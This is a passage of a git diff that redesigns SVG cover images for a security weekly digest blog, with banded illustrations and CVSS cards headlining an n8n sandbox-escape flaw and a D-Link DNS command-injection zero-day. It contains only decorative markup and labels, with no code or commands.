-    <path d="M0,-18 L16,12 L-16,12 Z" fill="none" stroke="#22c55e" stroke-width="1.8"/><text x="0" y="6" font-family="Courier New" font-size="9" font-weight="700" fill="#22c55e" text-anchor="middle">CVE</text>
-  </g>
-  <text x="840" y="197" font-family="Arial,sans-serif" font-size="13" font-weight="700" fill="#22c55e" text-anchor="middle">CVE PATCH</text>
-  <!-- Card 5: THREAT INT -->
-  <rect x="956" y="100" width="212" height="120" rx="8" fill="#071a20" stroke="#22d3ee" stroke-width="1.5"/>
-  <circle cx="976" cy="120" r="6" fill="#22d3ee"/>
-  <g transform="translate(1062,148)">
-    <path d="M0,-16 L14,-8 L14,4 C14,12 8,16 0,20 C-8,16 -14,12 -14,4 L-14,-8 Z" fill="none" stroke="#22d3ee" stroke-width="1.8"/>
-  </g>
-  <text x="1062" y="197" font-family="Arial,sans-serif" font-size="13" font-weight="700" fill="#22d3ee" text-anchor="middle">THREAT INT</text>
-
-  <!-- Threat map area -->
-  <rect x="32" y="240" width="1136" height="220" rx="10" fill="#0c1220" stroke="#1e293b" stroke-width="1"/>
-
-  <!-- Ambient dots -->
-  <g opacity="0.25">
-    <circle cx="180" cy="330" r="2" fill="#94a3b8"/><circle cx="200" cy="340" r="2" fill="#94a3b8"/>
-    <circle cx="550" cy="310" r="2" fill="#94a3b8"/><circle cx="570" cy="325" r="2" fill="#94a3b8"/>
-    <circle cx="750" cy="320" r="2" fill="#94a3b8"/><circle cx="900" cy="330" r="2" fill="#94a3b8"/>
-    <circle cx="350" cy="350" r="2" fill="#94a3b8"/><circle cx="1000" cy="340" r="2" fill="#94a3b8"/>
-  </g>
-  <!-- Node: ZERO-DAY -->
-  <circle cx="170" cy="340" r="22" fill="#1a0505" stroke="#ef4444" stroke-width="2"/>
-  <text x="170" y="344" font-family="Arial,sans-serif" font-size="9" font-weight="700" fill="#ef4444" text-anchor="middle">0DAY</text>
-  <!-- Node: CVE-2026-215 -->
-  <circle cx="370" cy="350" r="20" fill="#1a0d0d" stroke="#f59e0b" stroke-width="2"/>
-  <text x="370" y="354" font-family="Arial,sans-serif" font-size="9" font-weight="700" fill="#f59e0b" text-anchor="middle">CVE-2</text>
-  <!-- Node: SEC OPS -->
-  <circle cx="580" cy="330" r="22" fill="#0a1020" stroke="#3b82f6" stroke-width="2"/>
-  <text x="580" y="334" font-family="Arial,sans-serif" font-size="9" font-weight="700" fill="#3b82f6" text-anchor="middle">SEC</text>
-  <!-- Node: CVE PATCH -->
-  <circle cx="780" cy="355" r="18" fill="#071a10" stroke="#22c55e" stroke-width="2"/>
-  <text x="780" y="359" font-family="Arial,sans-serif" font-size="9" font-weight="700" fill="#22c55e" text-anchor="middle">CVE</text>
-  <!-- Node: THREAT INT -->
-  <circle cx="980" cy="340" r="22" fill="#071a20" stroke="#22d3ee" stroke-width="2"/>
-  <text x="980" y="344" font-family="Arial,sans-serif" font-size="9" font-weight="700" fill="#22d3ee" text-anchor="middle">THRE</text>
-  <line x1="192" y1="340" x2="350" y2="350" stroke="#ef4444" stroke-width="1.5" stroke-dasharray="10 6" opacity="0.6" marker-end="url(#ar)"/>
-  <line x1="390" y1="350" x2="558" y2="330" stroke="#f59e0b" stroke-width="1.5" stroke-dasharray="10 6" opacity="0.6" marker-end="url(#ar)"/>
-  <line x1="602" y1="330" x2="762" y2="355" stroke="#3b82f6" stroke-width="1.5" stroke-dasharray="10 6" opacity="0.6" marker-end="url(#ar)"/>
-  <line x1="798" y1="355" x2="958" y2="340" stroke="#22c55e" stroke-width="1.5" stroke-dasharray="10 6" opacity="0.6" marker-end="url(#ar)"/>
-
-  <!-- Footer -->
-  <rect x="0" y="472" width="1200" height="158" fill="#080c18" opacity="0.95"/>
-  <rect x="0" y="472" width="1200" height="2" fill="#1e293b"/>
-
-  <!-- Tags -->
-  <rect x="32" y="490" width="92" height="24" rx="4" fill="#1a0505" stroke="#ef4444" stroke-width="1"/>
-  <text x="78" y="506" font-family="Arial,sans-serif" font-size="10" font-weight="700" fill="#ef4444" text-anchor="middle">ZERO-DAY</text>
-  <rect x="136" y="490" width="128" height="24" rx="4" fill="#1a0d0d" stroke="#f59e0b" stroke-width="1"/>
-  <text x="200" y="506" font-family="Arial,sans-serif" font-size="10" font-weight="700" fill="#f59e0b" text-anchor="middle">CVE-2026-215</text>
-  <rect x="276" y="490" width="83" height="24" rx="4" fill="#0a1020" stroke="#3b82f6" stroke-width="1"/>
-  <text x="317" y="506" font-family="Arial,sans-serif" font-size="10" font-weight="700" fill="#3b82f6" text-anchor="middle">SEC OPS</text>
-  <rect x="371" y="490" width="101" height="24" rx="4" fill="#071a10" stroke="#22c55e" stroke-width="1"/>
-  <text x="421" y="506" font-family="Arial,sans-serif" font-size="10" font-weight="700" fill="#22c55e" text-anchor="middle">CVE PATCH</text>
-  <rect x="484" y="490" width="110" height="24" rx="4" fill="#071a20" stroke="#22d3ee" stroke-width="1"/>
-  <text x="539" y="506" font-family="Arial,sans-serif" font-size="10" font-weight="700" fill="#22d3ee" text-anchor="middle">THREAT INT</text>
-
-  <!-- Bottom bar -->
-  <circle cx="32" cy="545" r="4" fill="#ef4444" opacity="0.6"/>
-  <text x="46" y="550" font-family="Arial,sans-serif" font-size="12" fill="#475569">Security Weekly Digest | January 28, 2026</text>
-  <text x="1168" y="550" font-family="Arial,sans-serif" font-size="12" fill="#475569" text-anchor="end">tech.2twodragon.com</text>
+</g>
+<text x="1122" y="614" font-family="Inter, Helvetica, Arial, sans-serif" font-size="10" font-weight="700" fill="#F5F7FA" text-anchor="middle">scan / full post</text>
 </svg>

--- a/assets/images/2026-01-29-Tech_Security_Weekly_Digest_n8n_RCE_D_Link_Zero_Day_Kubernetes_AI_Agent.svg
+++ b/assets/images/2026-01-29-Tech_Security_Weekly_Digest_n8n_RCE_D_Link_Zero_Day_Kubernetes_AI_Agent.svg
@@ -1,134 +1,244 @@
-<svg xmlns="http://www.w3.org/2000/svg" width="1200" height="630" viewBox="0 0 1200 630">
-  <title>Security Weekly Digest - January 29, 2026</title>
-  <defs>
-    <linearGradient id="bg" x1="0%" y1="0%" x2="100%" y2="100%">
-      <stop offset="0%" stop-color="#0a0e1a"/>
-      <stop offset="60%" stop-color="#0f1628"/>
-      <stop offset="100%" stop-color="#141b2d"/>
-    </linearGradient>
-    <linearGradient id="hg" x1="0%" y1="0%" x2="100%" y2="0%">
-      <stop offset="0%" stop-color="#1e293b"/>
-      <stop offset="100%" stop-color="#0f172a"/>
-    </linearGradient>
-    <filter id="glow" x="-50%" y="-50%" width="200%" height="200%">
-      <feGaussianBlur stdDeviation="18"/>
-    </filter>
-    <marker id="ar" markerWidth="8" markerHeight="8" refX="4" refY="4" orient="auto">
-      <path d="M0,0 L8,4 L0,8 Z" fill="#ef4444" opacity="0.7"/>
-    </marker>
-  </defs>
+<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1200 630" width="1200" height="630" role="img" aria-label="Research-based weekly digest cover: n8n Critical RCE CVE-2026-1470, D-Link Zero-Day CVE-2026-0625, Kubernetes AI Agent eBPF Security">
+<title>Weekly digest 2026-01-29: n8n RCE (CVSS 9.9), D-Link Zero-Day (CVSS 9.3), Kubernetes AI Agent eBPF</title>
+<!-- profile: high-quality-cover (L22 Stacked Bands, research-based, batch1-locked) -->
+<defs>
+  <linearGradient id="bgSpread" x1="0%" y1="0%" x2="100%" y2="100%">
+    <stop offset="0%" stop-color="#0A1226"/>
+    <stop offset="50%" stop-color="#0C1430"/>
+    <stop offset="100%" stop-color="#131038"/>
+  </linearGradient>
+  <linearGradient id="bandA" x1="0%" y1="0%" x2="100%" y2="0%">
+    <stop offset="0%" stop-color="#0A1E10"/>
+    <stop offset="100%" stop-color="#0E2616"/>
+  </linearGradient>
+  <linearGradient id="bandB" x1="0%" y1="0%" x2="100%" y2="0%">
+    <stop offset="0%" stop-color="#1E0A0A"/>
+    <stop offset="100%" stop-color="#280D0D"/>
+  </linearGradient>
+  <linearGradient id="bandC" x1="0%" y1="0%" x2="100%" y2="0%">
+    <stop offset="0%" stop-color="#0A0E24"/>
+    <stop offset="100%" stop-color="#0D1230"/>
+  </linearGradient>
+  <radialGradient id="exploitBurst" cx="50%" cy="50%" r="50%">
+    <stop offset="0%" stop-color="#22C55E" stop-opacity="0.6"/>
+    <stop offset="100%" stop-color="#22C55E" stop-opacity="0"/>
+  </radialGradient>
+  <radialGradient id="dnsGlow" cx="50%" cy="50%" r="50%">
+    <stop offset="0%" stop-color="#F97316" stop-opacity="0.7"/>
+    <stop offset="100%" stop-color="#F97316" stop-opacity="0"/>
+  </radialGradient>
+  <radialGradient id="ebpfGlow" cx="50%" cy="50%" r="50%">
+    <stop offset="0%" stop-color="#818CF8" stop-opacity="0.5"/>
+    <stop offset="100%" stop-color="#818CF8" stop-opacity="0"/>
+  </radialGradient>
+  <filter id="softShadow" x="-10%" y="-10%" width="130%" height="130%">
+    <feGaussianBlur in="SourceAlpha" stdDeviation="2.5"/>
+    <feOffset dx="1" dy="3"/>
+    <feComponentTransfer><feFuncA type="linear" slope="0.55"/></feComponentTransfer>
+    <feMerge><feMergeNode/><feMergeNode in="SourceGraphic"/></feMerge>
+  </filter>
+  <filter id="textShadow" x="-5%" y="-5%" width="110%" height="110%">
+    <feGaussianBlur in="SourceAlpha" stdDeviation="1.2"/>
+    <feOffset dx="0" dy="1.5"/>
+    <feComponentTransfer><feFuncA type="linear" slope="0.85"/></feComponentTransfer>
+    <feMerge><feMergeNode/><feMergeNode in="SourceGraphic"/></feMerge>
+  </filter>
+  <pattern id="codeGrid" x="0" y="0" width="40" height="16" patternUnits="userSpaceOnUse">
+    <path d="M0 16 L40 16" stroke="#1A3020" stroke-width="0.4" opacity="0.5"/>
+    <path d="M40 0 L40 16" stroke="#1A3020" stroke-width="0.4" opacity="0.5"/>
+  </pattern>
+  <pattern id="dotMatrix" x="0" y="0" width="18" height="18" patternUnits="userSpaceOnUse">
+    <circle cx="9" cy="9" r="0.8" fill="#3A1818" opacity="0.55"/>
+  </pattern>
+  <pattern id="hexGrid" x="0" y="0" width="20" height="18" patternUnits="userSpaceOnUse">
+    <circle cx="10" cy="9" r="0.8" fill="#1A1A3A" opacity="0.5"/>
+  </pattern>
+</defs>
 
-  <rect width="1200" height="630" fill="url(#bg)"/>
+<rect width="1200" height="630" fill="url(#bgSpread)"/>
 
-  <!-- Grid -->
-  <g opacity="0.04" stroke="#94a3b8" stroke-width="0.5">
-    <line x1="0" y1="105" x2="1200" y2="105"/><line x1="0" y1="210" x2="1200" y2="210"/>
-    <line x1="0" y1="315" x2="1200" y2="315"/><line x1="0" y1="420" x2="1200" y2="420"/>
-    <line x1="0" y1="525" x2="1200" y2="525"/>
-    <line x1="240" y1="0" x2="240" y2="630"/><line x1="480" y1="0" x2="480" y2="630"/>
-    <line x1="720" y1="0" x2="720" y2="630"/><line x1="960" y1="0" x2="960" y2="630"/>
+<!-- Header stripe -->
+<rect x="0" y="0" width="1200" height="4" fill="#22C55E" opacity="0.7"/>
+
+<!-- Date label -->
+<text x="1185" y="26" text-anchor="end" font-family="Inter, Helvetica, Arial, sans-serif" font-size="15" font-weight="700" letter-spacing="1.5" fill="#94A3B8">2026.01.29</text>
+
+<!-- ===== BAND A: n8n Critical RCE (y=0-210) ===== -->
+<g>
+  <rect x="0" y="0" width="1200" height="210" fill="url(#bandA)"/>
+  <rect x="0" y="0" width="1200" height="210" fill="url(#codeGrid)" opacity="0.55"/>
+  <rect x="0" y="0" width="8" height="210" fill="#22C55E"/>
+
+  <g filter="url(#textShadow)">
+    <text x="30" y="44" font-family="Inter, Helvetica, Arial, sans-serif" font-size="18" font-weight="700" letter-spacing="2.4" fill="#22C55E">WORKFLOW RCE</text>
+    <text x="30" y="86" font-family="Inter, Helvetica, Arial, sans-serif" font-size="36" font-weight="800" fill="#F5F7FA">n8n : CVE-2026-1470</text>
+    <text x="30" y="118" font-family="Inter, Helvetica, Arial, sans-serif" font-size="20" font-weight="600" fill="#86EFAC">CVSS 9.9 : JS AST sandbox escape</text>
+    <text x="30" y="146" font-family="Inter, Helvetica, Arial, sans-serif" font-size="15" font-weight="500" fill="#BBD9C8">Patch: 1.123.17+ / 2.4.5+ / 2.5.1+ : Function constructor bypass</text>
   </g>
 
-  <!-- Glow orbs -->
-  <circle cx="200" cy="300" r="200" fill="#ef4444" opacity="0.06" filter="url(#glow)"/>
-  <circle cx="600" cy="350" r="180" fill="#f59e0b" opacity="0.05" filter="url(#glow)"/>
-  <circle cx="1000" cy="300" r="180" fill="#3b82f6" opacity="0.06" filter="url(#glow)"/>
-
-  <!-- Header -->
-  <rect x="0" y="0" width="1200" height="80" fill="url(#hg)" opacity="0.9"/>
-  <rect x="0" y="78" width="1200" height="2" fill="#334155" opacity="0.8"/>
-  <g transform="translate(48,40)">
-    <path d="M0,-22 L18,-12 L18,3 C18,13 10,20 0,24 C-10,20 -18,13 -18,3 L-18,-12 Z" fill="#1e3a5f" stroke="#3b82f6" stroke-width="1.5"/>
-    <path d="M-7,1 L-2,6 L8,-5" stroke="#3b82f6" stroke-width="2.5" fill="none" stroke-linecap="round"/>
+  <!-- Central illustration: sandbox escape code flow -->
+  <g transform="translate(620,105)" filter="url(#softShadow)">
+    <circle cx="0" cy="0" r="80" fill="url(#exploitBurst)">
+      <animate attributeName="r" values="60;90;60" dur="3.0s" repeatCount="indefinite"/>
+      <animate attributeName="opacity" values="0.5;1;0.5" dur="3.0s" repeatCount="indefinite"/>
+    </circle>
+    <rect x="-90" y="-50" width="100" height="100" rx="8" fill="#0A1E10" stroke="#22C55E" stroke-width="2"/>
+    <text x="-40" y="-22" text-anchor="middle" font-family="Inter, monospace" font-size="11" font-weight="700" fill="#22C55E">SANDBOX</text>
+    <text x="-40" y="-4" text-anchor="middle" font-family="Inter, monospace" font-size="10" fill="#86EFAC">AST eval()</text>
+    <text x="-40" y="12" text-anchor="middle" font-family="Inter, monospace" font-size="10" fill="#86EFAC">Function()</text>
+    <text x="-40" y="28" text-anchor="middle" font-family="Inter, monospace" font-size="10" fill="#86EFAC">constructor</text>
+    <path d="M10 0 L50 0" stroke="#F87171" stroke-width="2.5" fill="none" stroke-dasharray="4 3">
+      <animate attributeName="stroke-dashoffset" values="0;-14" dur="0.8s" repeatCount="indefinite"/>
+    </path>
+    <polygon points="50,-6 62,0 50,6" fill="#F87171"/>
+    <rect x="62" y="-28" width="80" height="56" rx="8" fill="#1E0A0A" stroke="#F87171" stroke-width="2"/>
+    <text x="102" y="-8" text-anchor="middle" font-family="Inter, monospace" font-size="13" font-weight="800" fill="#F87171">RCE</text>
+    <text x="102" y="12" text-anchor="middle" font-family="Inter, monospace" font-size="10" fill="#FCA5A5">EXEC</text>
+    <circle cx="102" cy="0" r="35" fill="none" stroke="#F87171" stroke-width="0.8">
+      <animate attributeName="r" values="30;55;30" dur="2.2s" repeatCount="indefinite"/>
+      <animate attributeName="opacity" values="0.8;0;0.8" dur="2.2s" repeatCount="indefinite"/>
+    </circle>
   </g>
-  <text x="80" y="44" font-family="Arial,sans-serif" font-size="28" font-weight="700" fill="#f1f5f9">Security Weekly Digest</text>
-  <rect x="990" y="18" width="178" height="44" rx="6" fill="#1e293b" stroke="#334155" stroke-width="1"/>
-  <text x="1079" y="48" font-family="Arial,sans-serif" font-size="15" font-weight="700" fill="#94a3b8" text-anchor="middle">January 29, 2026</text>
 
-  <!-- Card 1: ZERO-DAY -->
-  <rect x="32" y="100" width="220" height="120" rx="8" fill="#1a0505" stroke="#ef4444" stroke-width="1.5"/>
-  <circle cx="52" cy="120" r="6" fill="#ef4444"/>
-  <g transform="translate(142,148)">
-    <path d="M0,-18 L16,12 L-16,12 Z" fill="none" stroke="#ef4444" stroke-width="1.8"/><text x="0" y="6" font-family="Courier New" font-size="9" font-weight="700" fill="#ef4444" text-anchor="middle">CVE</text>
+  <!-- Right KPI card -->
+  <g transform="translate(990,105)" filter="url(#softShadow)">
+    <rect x="-80" y="-65" width="180" height="125" rx="14" fill="#081208" stroke="#22C55E" stroke-width="2.2"/>
+    <text x="10" y="-30" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="13" font-weight="700" letter-spacing="2" fill="#22C55E">CVSS</text>
+    <text x="10" y="28" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="72" font-weight="900" fill="#F5F7FA">9.9</text>
+    <text x="10" y="52" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="600" fill="#86EFAC">CRITICAL : JS + Python</text>
   </g>
-  <text x="142" y="197" font-family="Arial,sans-serif" font-size="13" font-weight="700" fill="#ef4444" text-anchor="middle">ZERO-DAY</text>
-  <!-- Card 2: AI AGENT -->
-  <rect x="268" y="100" width="220" height="120" rx="8" fill="#1a0d0d" stroke="#f59e0b" stroke-width="1.5"/>
-  <circle cx="288" cy="120" r="6" fill="#f59e0b"/>
-  <g transform="translate(378,148)">
-    <circle cx="-12" cy="-8" r="4" fill="none" stroke="#f59e0b" stroke-width="1.5"/><circle cx="12" cy="-8" r="4" fill="none" stroke="#f59e0b" stroke-width="1.5"/><circle cx="0" cy="8" r="5" fill="none" stroke="#f59e0b" stroke-width="1.8"/><line x1="-8" y1="-6" x2="-2" y2="6" stroke="#f59e0b" stroke-width="1.2" opacity="0.7"/><line x1="8" y1="-6" x2="2" y2="6" stroke="#f59e0b" stroke-width="1.2" opacity="0.7"/><line x1="-8" y1="-8" x2="8" y2="-8" stroke="#f59e0b" stroke-width="1.2" opacity="0.5"/>
-  </g>
-  <text x="378" y="197" font-family="Arial,sans-serif" font-size="13" font-weight="700" fill="#f59e0b" text-anchor="middle">AI AGENT</text>
-  <!-- Card 3: K8S -->
-  <rect x="504" y="100" width="220" height="120" rx="8" fill="#0a1020" stroke="#3b82f6" stroke-width="1.5"/>
-  <circle cx="524" cy="120" r="6" fill="#3b82f6"/>
-  <g transform="translate(614,148)">
-    <circle cx="0" cy="0" r="10" fill="none" stroke="#3b82f6" stroke-width="1.8"/><circle cx="0" cy="0" r="4" fill="#3b82f6" opacity="0.5"/><line x1="0" y1="-10" x2="0" y2="-18" stroke="#3b82f6" stroke-width="2"/><line x1="8.7" y1="5" x2="15.6" y2="9" stroke="#3b82f6" stroke-width="2"/><line x1="-8.7" y1="5" x2="-15.6" y2="9" stroke="#3b82f6" stroke-width="2"/>
-  </g>
-  <text x="614" y="197" font-family="Arial,sans-serif" font-size="13" font-weight="700" fill="#3b82f6" text-anchor="middle">K8S</text>
-  <!-- Card 4: SEC OPS -->
-  <rect x="740" y="100" width="200" height="120" rx="8" fill="#071a10" stroke="#22c55e" stroke-width="1.5"/>
-  <circle cx="760" cy="120" r="6" fill="#22c55e"/>
-  <g transform="translate(840,148)">
-    <path d="M0,-16 L14,-8 L14,4 C14,12 8,16 0,20 C-8,16 -14,12 -14,4 L-14,-8 Z" fill="none" stroke="#22c55e" stroke-width="1.8"/>
-  </g>
-  <text x="840" y="197" font-family="Arial,sans-serif" font-size="13" font-weight="700" fill="#22c55e" text-anchor="middle">SEC OPS</text>
-  <!-- Card 5: THREAT INT -->
-  <rect x="956" y="100" width="212" height="120" rx="8" fill="#071a20" stroke="#22d3ee" stroke-width="1.5"/>
-  <circle cx="976" cy="120" r="6" fill="#22d3ee"/>
-  <g transform="translate(1062,148)">
-    <path d="M0,-16 L14,-8 L14,4 C14,12 8,16 0,20 C-8,16 -14,12 -14,4 L-14,-8 Z" fill="none" stroke="#22d3ee" stroke-width="1.8"/>
-  </g>
-  <text x="1062" y="197" font-family="Arial,sans-serif" font-size="13" font-weight="700" fill="#22d3ee" text-anchor="middle">THREAT INT</text>
 
-  <!-- Threat map area -->
-  <rect x="32" y="240" width="1136" height="220" rx="10" fill="#0c1220" stroke="#1e293b" stroke-width="1"/>
+  <circle cx="240" cy="175" r="1.5" fill="#22C55E" opacity="0.6"/>
+  <circle cx="310" cy="175" r="1.5" fill="#22C55E" opacity="0.6"/>
+  <circle cx="380" cy="175" r="1.5" fill="#22C55E" opacity="0.6"/>
+  <rect x="820" y="30" width="6" height="2" fill="#22C55E" opacity="0.5"/>
+  <rect x="840" y="30" width="6" height="2" fill="#22C55E" opacity="0.5"/>
+  <circle cx="990" cy="40" r="3" fill="#22C55E" opacity="0.5"/>
+</g>
 
-  <!-- Ambient dots -->
-  <g opacity="0.25">
-    <circle cx="180" cy="330" r="2" fill="#94a3b8"/><circle cx="200" cy="340" r="2" fill="#94a3b8"/>
-    <circle cx="550" cy="310" r="2" fill="#94a3b8"/><circle cx="570" cy="325" r="2" fill="#94a3b8"/>
-    <circle cx="750" cy="320" r="2" fill="#94a3b8"/><circle cx="900" cy="330" r="2" fill="#94a3b8"/>
-    <circle cx="350" cy="350" r="2" fill="#94a3b8"/><circle cx="1000" cy="340" r="2" fill="#94a3b8"/>
+<!-- ===== BAND B: D-Link Zero-Day (y=210-420) ===== -->
+<g>
+  <rect x="0" y="210" width="1200" height="210" fill="url(#bandB)"/>
+  <rect x="0" y="210" width="1200" height="210" fill="url(#dotMatrix)" opacity="0.7"/>
+  <rect x="0" y="210" width="8" height="210" fill="#F97316"/>
+
+  <g filter="url(#textShadow)">
+    <text x="30" y="254" font-family="Inter, Helvetica, Arial, sans-serif" font-size="18" font-weight="700" letter-spacing="2.4" fill="#FB923C">EoL DEVICE ZERO-DAY</text>
+    <text x="30" y="296" font-family="Inter, Helvetica, Arial, sans-serif" font-size="36" font-weight="800" fill="#F5F7FA">D-Link : CVE-2026-0625</text>
+    <text x="30" y="328" font-family="Inter, Helvetica, Arial, sans-serif" font-size="20" font-weight="600" fill="#FDBA74">CVSS 9.3 : DNS command injection</text>
+    <text x="30" y="356" font-family="Inter, Helvetica, Arial, sans-serif" font-size="15" font-weight="500" fill="#E8CCBA">DSL-2740R / 2640B / 2780B / 526B : No patch : Active exploitation</text>
   </g>
-  <!-- Node: ZERO-DAY -->
-  <circle cx="170" cy="340" r="22" fill="#1a0505" stroke="#ef4444" stroke-width="2"/>
-  <text x="170" y="344" font-family="Arial,sans-serif" font-size="9" font-weight="700" fill="#ef4444" text-anchor="middle">0DAY</text>
-  <!-- Node: AI AGENT -->
-  <circle cx="370" cy="350" r="20" fill="#1a0d0d" stroke="#f59e0b" stroke-width="2"/>
-  <text x="370" y="354" font-family="Arial,sans-serif" font-size="9" font-weight="700" fill="#f59e0b" text-anchor="middle">AI</text>
-  <!-- Node: K8S -->
-  <circle cx="580" cy="330" r="22" fill="#0a1020" stroke="#3b82f6" stroke-width="2"/>
-  <text x="580" y="334" font-family="Arial,sans-serif" font-size="9" font-weight="700" fill="#3b82f6" text-anchor="middle">K8S</text>
-  <!-- Node: SEC OPS -->
-  <circle cx="780" cy="355" r="18" fill="#071a10" stroke="#22c55e" stroke-width="2"/>
-  <text x="780" y="359" font-family="Arial,sans-serif" font-size="9" font-weight="700" fill="#22c55e" text-anchor="middle">SEC</text>
-  <!-- Node: THREAT INT -->
-  <circle cx="980" cy="340" r="22" fill="#071a20" stroke="#22d3ee" stroke-width="2"/>
-  <text x="980" y="344" font-family="Arial,sans-serif" font-size="9" font-weight="700" fill="#22d3ee" text-anchor="middle">THRE</text>
-  <line x1="192" y1="340" x2="350" y2="350" stroke="#ef4444" stroke-width="1.5" stroke-dasharray="10 6" opacity="0.6" marker-end="url(#ar)"/>
-  <line x1="390" y1="350" x2="558" y2="330" stroke="#f59e0b" stroke-width="1.5" stroke-dasharray="10 6" opacity="0.6" marker-end="url(#ar)"/>
-  <line x1="602" y1="330" x2="762" y2="355" stroke="#3b82f6" stroke-width="1.5" stroke-dasharray="10 6" opacity="0.6" marker-end="url(#ar)"/>
-  <line x1="798" y1="355" x2="958" y2="340" stroke="#22c55e" stroke-width="1.5" stroke-dasharray="10 6" opacity="0.6" marker-end="url(#ar)"/>
 
-  <!-- Footer -->
-  <rect x="0" y="472" width="1200" height="158" fill="#080c18" opacity="0.95"/>
-  <rect x="0" y="472" width="1200" height="2" fill="#1e293b"/>
+  <!-- Central illustration: DNS injection -->
+  <g transform="translate(650,315)">
+    <circle cx="0" cy="0" r="80" fill="url(#dnsGlow)">
+      <animate attributeName="r" values="55;85;55" dur="3.5s" repeatCount="indefinite"/>
+      <animate attributeName="opacity" values="0.4;0.9;0.4" dur="3.5s" repeatCount="indefinite"/>
+    </circle>
+    <rect x="-95" y="-32" width="90" height="64" rx="8" fill="#1E0A00" stroke="#F97316" stroke-width="2" filter="url(#softShadow)"/>
+    <text x="-50" y="-10" text-anchor="middle" font-family="Inter, monospace" font-size="11" font-weight="800" fill="#FB923C">D-LINK</text>
+    <text x="-50" y="6" text-anchor="middle" font-family="Inter, monospace" font-size="10" fill="#FED7AA">DSL-2740R</text>
+    <text x="-50" y="22" text-anchor="middle" font-family="Inter, monospace" font-size="10" fill="#FED7AA">EoL</text>
+    <circle cx="-75" cy="-42" r="3" fill="#F97316"><animate attributeName="opacity" values="0.3;1;0.3" dur="1.2s" repeatCount="indefinite"/></circle>
+    <circle cx="-50" cy="-46" r="3" fill="#F97316"><animate attributeName="opacity" values="0.3;1;0.3" dur="1.5s" begin="0.3s" repeatCount="indefinite"/></circle>
+    <circle cx="-25" cy="-42" r="3" fill="#F97316"><animate attributeName="opacity" values="0.3;1;0.3" dur="1.8s" begin="0.6s" repeatCount="indefinite"/></circle>
+    <path d="M-5 0 L45 0" stroke="#EF4444" stroke-width="2.5" fill="none" stroke-dasharray="5 3">
+      <animate attributeName="stroke-dashoffset" values="0;-16" dur="0.9s" repeatCount="indefinite"/>
+    </path>
+    <polygon points="45,-6 57,0 45,6" fill="#EF4444"/>
+    <rect x="57" y="-35" width="100" height="70" rx="8" fill="#280505" stroke="#EF4444" stroke-width="2"/>
+    <text x="107" y="-14" text-anchor="middle" font-family="Inter, monospace" font-size="10" font-weight="800" fill="#EF4444">CMD INJECT</text>
+    <text x="107" y="4" text-anchor="middle" font-family="Inter, monospace" font-size="9" fill="#FCA5A5">DNS query</text>
+    <text x="107" y="20" text-anchor="middle" font-family="Inter, monospace" font-size="9" fill="#FCA5A5">; exploit ;</text>
+    <circle cx="107" cy="0" r="40" fill="none" stroke="#EF4444" stroke-width="0.8">
+      <animate attributeName="r" values="35;65;35" dur="2.5s" repeatCount="indefinite"/>
+      <animate attributeName="opacity" values="0.8;0;0.8" dur="2.5s" repeatCount="indefinite"/>
+    </circle>
+  </g>
 
-  <!-- Tags -->
-  <rect x="32" y="490" width="92" height="24" rx="4" fill="#1a0505" stroke="#ef4444" stroke-width="1"/>
-  <text x="78" y="506" font-family="Arial,sans-serif" font-size="10" font-weight="700" fill="#ef4444" text-anchor="middle">ZERO-DAY</text>
-  <rect x="136" y="490" width="92" height="24" rx="4" fill="#1a0d0d" stroke="#f59e0b" stroke-width="1"/>
-  <text x="182" y="506" font-family="Arial,sans-serif" font-size="10" font-weight="700" fill="#f59e0b" text-anchor="middle">AI AGENT</text>
-  <rect x="240" y="490" width="80" height="24" rx="4" fill="#0a1020" stroke="#3b82f6" stroke-width="1"/>
-  <text x="280" y="506" font-family="Arial,sans-serif" font-size="10" font-weight="700" fill="#3b82f6" text-anchor="middle">K8S</text>
-  <rect x="332" y="490" width="83" height="24" rx="4" fill="#071a10" stroke="#22c55e" stroke-width="1"/>
-  <text x="373" y="506" font-family="Arial,sans-serif" font-size="10" font-weight="700" fill="#22c55e" text-anchor="middle">SEC OPS</text>
-  <rect x="427" y="490" width="110" height="24" rx="4" fill="#071a20" stroke="#22d3ee" stroke-width="1"/>
-  <text x="482" y="506" font-family="Arial,sans-serif" font-size="10" font-weight="700" fill="#22d3ee" text-anchor="middle">THREAT INT</text>
+  <!-- Right KPI card -->
+  <g transform="translate(990,315)" filter="url(#softShadow)">
+    <rect x="-80" y="-65" width="180" height="125" rx="14" fill="#1E0800" stroke="#F97316" stroke-width="2.2"/>
+    <text x="10" y="-30" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="13" font-weight="700" letter-spacing="2" fill="#FB923C">CVSS</text>
+    <text x="10" y="28" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="72" font-weight="900" fill="#F5F7FA">9.3</text>
+    <text x="10" y="52" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="600" fill="#FDBA74">NO PATCH : REPLACE</text>
+  </g>
 
-  <!-- Bottom bar -->
-  <circle cx="32" cy="545" r="4" fill="#ef4444" opacity="0.6"/>
-  <text x="46" y="550" font-family="Arial,sans-serif" font-size="12" fill="#475569">Security Weekly Digest | January 29, 2026</text>
-  <text x="1168" y="550" font-family="Arial,sans-serif" font-size="12" fill="#475569" text-anchor="end">tech.2twodragon.com</text>
+  <circle cx="260" cy="390" r="1.5" fill="#F97316"><animate attributeName="opacity" values="0;1;0" dur="1.5s" repeatCount="indefinite"/></circle>
+  <circle cx="330" cy="390" r="1.5" fill="#F97316"><animate attributeName="opacity" values="0;1;0" dur="1.7s" begin="0.2s" repeatCount="indefinite"/></circle>
+  <circle cx="400" cy="390" r="1.5" fill="#F97316"><animate attributeName="opacity" values="0;1;0" dur="1.9s" begin="0.4s" repeatCount="indefinite"/></circle>
+  <rect x="820" y="240" width="4" height="4" rx="1" fill="#FB923C"><animate attributeName="opacity" values="0.3;1;0.3" dur="1.4s" repeatCount="indefinite"/></rect>
+  <rect x="840" y="240" width="4" height="4" rx="1" fill="#FB923C"><animate attributeName="opacity" values="0.3;1;0.3" dur="1.2s" begin="0.3s" repeatCount="indefinite"/></rect>
+</g>
+
+<!-- ===== BAND C: Kubernetes AI Agent + eBPF (y=420-630) ===== -->
+<g>
+  <rect x="0" y="420" width="1200" height="210" fill="url(#bandC)"/>
